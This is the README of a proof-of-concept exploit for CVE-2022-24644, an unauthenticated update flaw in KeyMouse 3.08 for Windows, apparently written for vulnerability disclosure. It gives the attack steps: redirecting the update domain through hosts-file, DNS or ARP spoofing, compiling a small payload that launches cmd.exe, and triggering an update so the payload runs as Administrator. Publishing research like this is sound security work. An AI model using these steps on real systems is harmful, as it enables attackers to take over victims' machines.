ZZ Inc. KeyMouse 3.08 (Windows) Unauthenticated Update Remote Code Execution Vulnerability
Usage: python3 cve-2022-24644_poc.py
Details in the report at gerr.re.
- Install KeyMouse Windows 3.08;
- Set spoof
www.keymouse.com
to our attacker ip;- For the proof-of-concept it is easiest to edit
c:\windows\system32\drivers\etc\hosts
on the target.- Attackers may e.g. use:
- poorly configured routers/switches/DNS
- DNS cache poisoning
- ARP cache poisoning
- Attackers may e.g. use:
- For the proof-of-concept it is easiest to edit
- Compile
proof.c
on the attacker, e.g. usingi686-w64-mingw32-gcc proof.c -o proof.exe
;
#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
- Run the proof-of-concept script on the attacker;
- Start KeyMouse on the target and trigger an update:
- Application Menu: Help -> Check For Updates
- Task Bar: right mouse button on task bar icon -> Check Updates (or Install Updates)
- Continue with the update.
As a result, proof.exe
is executed in the context of the Administrator user at high integrity.